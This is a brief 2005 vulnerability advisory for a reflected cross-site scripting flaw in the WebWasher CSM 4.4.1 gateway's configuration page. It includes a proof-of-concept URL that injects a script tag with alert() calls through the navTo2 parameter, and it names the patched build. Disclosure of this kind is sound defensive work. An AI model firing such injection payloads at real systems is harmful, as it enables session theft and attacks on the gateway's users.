WebWasher CSM Conf Script Cross-Site Scripting Vulnerability
============================================================


Whatis:
=======

From vendor website:

"Offering a combination of Content Security Management features in a single, fully integrated product, 
WebWasher CSM Suite is a solution for securing and managing web and e-mail gateways. 
Featuring centralized policy and reporting, single-installation deployment, and coordinated antivirus scanning; 
WebWasher CSM Suite enables significant cost efficiencies, productivity improvements, and security against the most 
dangerous hybrid threats."


Vulnerability:
==============

Classical Cross Site Scripting Vulnerability.


Exploiting:
===========

http://www.example.com:9090/conf?navTo1=Rep&navTo2=Dean"><script>alert("Welcome%20to%20Webwasher");alert("Script%20Code%20will%20be%20executed")</script>on&userId=default&foo 
=1549218


Vulnerable version:
===================

WebWasher WebWasher CSM 4.4.1 Build 752


Solution:
=========

Update to WebWasher CSM 4.4.1 Build 1613

https://extranet.webwasher.com/download/csm/index.html 
(account required)


Discovered:
===========

by oliver karow
www.oliverkarow.de/research/wwcsm.txt
10.03.2005